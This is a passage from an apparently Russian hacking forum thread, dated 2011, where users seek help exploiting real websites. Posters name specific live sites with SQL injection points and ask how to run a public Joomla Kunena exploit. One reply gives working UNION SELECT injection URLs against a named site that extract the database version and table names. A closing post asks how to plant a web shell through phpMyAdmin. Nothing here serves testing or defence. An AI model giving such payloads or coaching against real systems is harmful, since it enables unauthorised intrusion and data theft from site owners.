15.03.2011, 03:49
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от None
При проверке file_priv выдалось
SELECT command denied to user 'g4rt'@'localhost' for table 'user'
это типа в доступе к file_priv отказано, да?
Это значит что отказано в доступе к базе данных под именем "mysql" и к таблице "mysql.user" в частности, соответственно, в большинстве случаев file_priv тоже нет.
|
|
|
15.03.2011, 16:27
|
|
Участник форума
Регистрация: 19.12.2010
Сообщений: 155
С нами:
8103926
Репутация:
85
|
|
Привет всем!
В общем захотелось заняться пентестом джумлы)
нашел на сайте уязвимый Joomla Kunena Forums
также для него нашел эксплойт под BSQL
http://www.exploit-db.com/exploits/9408/
Подскажите пожалуйста как заюзать эксплойт?
в эксплойте написано
Сообщение от None
Usage: target.php [site][SQL]
понятно что юзать скрипт надо по шаблону вида
exploit.php?site=http://joomlasite.... но вот не понятно на какую именно страницу надо передавать!
Может кто пояснить? |
|
|
|
15.03.2011, 16:41
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
на страницу, в которой есть уязвимый параметр. и передавать нужно последним параметр(в случае если их несколько)
|
|
|
|
15.03.2011, 17:33
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
С нами:
8638130
Репутация:
54
|
|
http://www.rxinternational.com/pricelist.asp?mscquery=spray'
не могу раскрутить
|
|
|
|
15.03.2011, 21:06
|
|
Участник форума
Регистрация: 02.09.2009
Сообщений: 286
С нами:
8784803
Репутация:
257
|
|
Сообщение от pinch
http://www.rxinternational.com/pricelist.asp?mscquery=spray'
не могу раскрутить
Microsoft Access
Рекомендую прочесть эту статью:
/threadnav50550-1-10.html
|
|
|
|
15.03.2011, 21:11
|
|
Познающий
Регистрация: 19.02.2011
Сообщений: 32
С нами:
8014646
Репутация:
-3
|
|
http://minysa.ru/infusions/mp3/song.php?song_id=-340'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19--'
При вставке слов страница не загружается, как обойти?
|
|
|
|
15.03.2011, 21:21
|
|
Участник форума
Регистрация: 25.11.2009
Сообщений: 201
С нами:
8663063
Репутация:
226
|
|
скобки нельзя использовать
Код:
http://minysa.ru/infusions/mp3/song.php?song_id=-340%27+union+select+1,@@version,3,4,5,6,7,8,9,10,11,12,13,14%20,15,16,17,18,19--%27
предсказывая следующий вопрос, можно сделать так:
Код:
http://minysa.ru/infusions/mp3/song.php?song_id=-340%27+union+select+1,table_name,3,4,5,6,7,8,9,10,11,12,13,14%20,15,16,17,18,19+from+information_schema.tables+limit+17,1--%20%27
|
|
|
|
15.03.2011, 23:28
|
|
Познающий
Регистрация: 19.02.2011
Сообщений: 32
С нами:
8014646
Репутация:
-3
|
|
Возможно ли вотэто как либо использовать?
http://www.gamereplays.org/community/index.php?act=SF&f=99999999
|
|
|
|
16.03.2011, 00:46
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
С нами:
9846041
Репутация:
1177
|
|
Сообщение от asql
Возможно ли вотэто как либо использовать?
http://www.gamereplays.org/community/index.php?act=SF&f=99999999
Нет, данная переменная принимает только числа.
Может начнем статьи читать и немного изучим PHP + MySQL?
//и начнём читать статьи прежде чем задать вопрос
|
|
|
|
16.03.2011, 15:01
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
можно ли через phpmyadmin 2.8.0.3 залить шелл не зная полного пути? с примером пожалуйста
Объясните плиз вот это
/showpost.php?p=1323558&postcount=12
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
